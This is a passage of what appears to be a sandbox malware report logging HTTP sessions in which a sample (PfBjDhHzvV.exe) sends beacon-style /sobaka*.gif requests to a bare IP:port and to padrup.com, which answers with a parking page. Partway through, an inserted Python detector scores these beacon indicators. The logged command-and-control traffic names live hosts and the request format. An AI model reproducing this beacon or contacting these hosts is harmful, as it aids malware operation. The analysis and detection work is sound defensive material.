    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.7  49943        185.53.178.50   80                7272  C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 09:38:54.130867004 CEST  155                OUT        GET /sobaka1.gif?4b65019=711512289 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 09:38:55.191478968 CEST  1236               IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 07:38:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fxvyEBetksA0OKlNhOfGCv6e3RlB4kIclgiOeidZaP/osfXKOROy319sd+74m8ySUidaSFAdFumZorPFh9WrSw==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191603899 CEST203INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEzNC44NTE2Ojc2YmVhZDAzYzg2N2VhYzkyM2U3OTc5YWE1MjkwZTMyMmNmNTZmMjdlMWRhNzI2MDQ2
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191613913 CEST1236INData Raw: 36 66 39 0d 0a 4d 47 45 7a 5a 47 51 77 4e 32 55 79 4f 44 41 32 59 7a 63 36 4e 6a 63 78 4d 6a 45 77 4f 47 56 6a 5a 6d 56 69 4d 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
                                                                                                                                                                                                                                  Data Ascii: 6f9MGEzZGQwN2UyODA2Yzc6NjcxMjEwOGVjZmViMg==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191909075 CEST561INData Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
                                                                                                                                                                                                                                  Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712108f&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '25dcb738128b3d52575e5fb7d6f2d1dddc46d8b1');</scr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 62459 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:55.212109089 CEST | 168 | OUT | GET /sobakavolos.gif?4d57b0b=162199062 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 62487 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:59.426867008 CEST | 155 | OUT | GET /sobaka1.gif?568bd78=635252296 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:00.499979973 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_gbAMxxk61XTGR2W62W0jrFfJfua33oi7qp0rfgCrauE5jadmhPBKN/20gSUBmmK2l/NtZtrG9rv5zXIzjzcjsQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:39:00.500058889 CEST | 214 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE0MC4xNjc6MjI0ZGI4NzNkMjczNjRiMjVlYjc2OTRmMTQ0MzQwODVhMjQ0MDJhYmEzOTJlZGE4ZTA2MzczNzQ0Y2I
Oct 18, 2024 09:39:00.500077009 CEST | 1236 | IN | Data Raw: 36 65 61 0d 0a 7a 59 7a 45 30 4d 54 6f 32 4e 7a 45 79 4d 54 41 35 4e 44 49 34 59 7a 4a 6a 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61
Data Ascii: 6eazYzE0MTo2NzEyMTA5NDI4YzJj';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';
Oct 18, 2024 09:39:00.500366926 CEST | 546 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31
Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67121094&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '8882c916bfdd7be295e5032498290b32c985989d');</script><script


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 62493 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:00.539690971 CEST | 168 | OUT | GET /sobakavolos.gif?588b379=464224605 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 62510 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:05.683607101 CEST | 156 | OUT | GET /sobaka1.gif?617d87e=1022260460 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:06.749342918 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SZnlX2/fiCa+BhJAmL9+s1jQxIkM26NlWeQDU57V4DypYoXU8Me9HnyLP0RlYkhRZN4qsESRNZiUHWdRiyWilQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749372959 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE0Ni40MDk4OmY5YzM3NmNlN2RjMWJmNmY0MjdiNDI1MmE1MDQ4MjlkOTI3OGQxMjQyOWFmNjM2NjU3ZGI5MzRmZjg2YTYzOTk6Njc
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749383926 CEST1236INData Raw: 78 4d 6a 45 77 4f 57 45 32 4e 44 42 6c 59 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                  Data Ascii: xMjEwOWE2NDBlYg==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749485970 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 31 30 39 61 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                  Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712109a&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'da4d0ca821e579c737fa36ca259949335146f3ef473');</script><script type='


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
19         | 192.168.2.7 | 62512       | 190.120.227.91 | 8080             | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:06.780811071 CEST | 168 | OUT | GET /sobakavolos.gif?653dba7=849272120 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
20         | 192.168.2.7 | 62513       | 185.53.178.50  | 80               | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:11.041985035 CEST | 155 | OUT | GET /sobaka1.gif?6eac3db=348146577 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:12.134852886 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_aDQVyP6ZGPTxG2i4uSftzoh8tTh7XQF6YiPjNo45ba7c/MbgtnfRKxt1vNI5trLVE6YvqyQvHR8wpVWkUZLcIA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:39:12.134888887 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE1MS43ODM4OmJlNTJhYzcxZmZmZGMwYTQwMzRlNjAxNGFkZGU2YjNlMTMyOGUyNGRlODBhMmY3ZDQyZTQyMWRjZDg3MDFlMjQ6NjcxMjEwOWZiZjU4ZQ==';
Oct 18, 2024 09:39:12.134905100 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 09:39:12.135001898 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 62 31 64 64 64 38 30 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 146b1ddd80');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


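The requests in sessions 19 to 22 share three fixed traits: a hard-coded User-Agent string (MSIE 7.0b on Windows NT 6.0), a Cache-Control: no-cache header on what is nominally an image fetch, and a path of the form /sobaka*.gif?<hex>=<decimal>; the two contacts to a bare IP:port (190.120.227.91:8080) get no reply, while padrup.com answers with text/html carrying X-Redirect and X-Template headers, i.e. an ad-parking template rather than GIF data. The detection logic below is an added example and is not code from the Joe Sandbox report or from the analysed sample. It parses captured request/response text and scores those indicators; the sample messages are constructed from the traffic shown above (a benign browser request is added as a control), and the regex that generalises the query string beyond the four observed URLs is an assumption.

```python
"""Detection logic for the beacon-style HTTP requests in sessions 19-22.

Added example, not part of the Joe Sandbox report or of the sample.  The
request/response samples are constructed from the traffic shown on the page;
BEACON_PATH generalising the four observed URLs is an assumption.
"""
import re
from dataclasses import dataclass

# Observed: /sobakavolos.gif?653dba7=849272120 and /sobaka1.gif?6eac3db=348146577
# Assumption: the key is lowercase hex and the value decimal, of any length.
BEACON_PATH = re.compile(r"^/sobaka[A-Za-z0-9]*\.gif\?[0-9a-f]+=\d+$")
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
IP_PORT_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}$")


@dataclass
class HttpMessage:
    start_line: str
    headers: dict   # header names lower-cased
    body: str


def parse_http(raw: str) -> HttpMessage:
    """Split one HTTP message into start line, header map and body.
    Accepts CRLF or bare LF so text pasted from a report parses too."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0].strip(), headers, body)


def request_indicators(req: HttpMessage) -> list:
    """Return the individual indicators that fire on one request."""
    method, path, *_ = req.start_line.split(" ")
    hits = []
    if method == "GET" and BEACON_PATH.match(path):
        hits.append("path: sobaka*.gif with hex=decimal query")
    if req.headers.get("user-agent") == BEACON_UA:
        hits.append("user-agent: hard-coded MSIE 7.0b / NT 6.0 string")
    if req.headers.get("cache-control", "").lower() == "no-cache":
        hits.append("cache-control: no-cache on an image fetch")
    if IP_PORT_HOST.match(req.headers.get("host", "")):
        hits.append("host: bare IP:port instead of a DNS name")
    return hits


def is_beacon(raw_request: str) -> bool:
    """Alert only when the path pattern fires together with at least one
    corroborating header, so a lone no-cache header never alerts."""
    hits = request_indicators(parse_http(raw_request))
    return any(h.startswith("path:") for h in hits) and len(hits) >= 2


def classify_response(raw_response: str) -> str:
    """Tell a real image payload from the parking-page HTML that padrup.com
    returned in the report (X-Redirect / X-Template headers)."""
    resp = parse_http(raw_response)
    if resp.headers.get("content-type", "").lower().startswith("image/"):
        return "image-payload"
    if "x-redirect" in resp.headers or "x-template" in resp.headers:
        return "parking-page"
    return "other"


# Constructed samples, copied from the requests in sessions 19 and 20.
REQ_IP_PORT = (
    "GET /sobakavolos.gif?653dba7=849272120 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: 190.120.227.91:8080\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
REQ_DOMAIN = (
    "GET /sobaka1.gif?6eac3db=348146577 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: padrup.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed benign control: a browser fetching an ordinary GIF.
REQ_BENIGN = (
    "GET /images/logo.gif?v=3 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0\r\n"
    "Host: www.example.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed from the session 20 response headers (body truncated).
RESP_PARKING = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Transfer-Encoding: chunked\r\n"
    "X-Redirect: skenzo\r\n"
    "X-Template: tpl_CleanPeppermintBlack_twoclick\r\n"
    "X-Pcrew-Blocked-Reason: hosting network\r\n\r\n"
    "793\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\">\r\n"
)

if __name__ == "__main__":
    for name, req in (("ip-port", REQ_IP_PORT), ("domain", REQ_DOMAIN), ("benign", REQ_BENIGN)):
        print(name, is_beacon(req), request_indicators(parse_http(req)))
    print("response:", classify_response(RESP_PARKING))
```

Requiring the path match plus one corroborating header keeps the rule specific to this beacon shape; the response classifier matters in triage because a parked domain answering 200 OK with an ad template tells you the infrastructure is dead or taken over, not that the sample received tasking.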
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
21         | 192.168.2.7 | 62514       | 190.120.227.91 | 8080             | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:12.170757055 CEST | 168 | OUT | GET /sobakavolos.gif?70c2488=591181480 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
22         | 192.168.2.7 | 62516       | 185.53.178.50  | 80               | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe

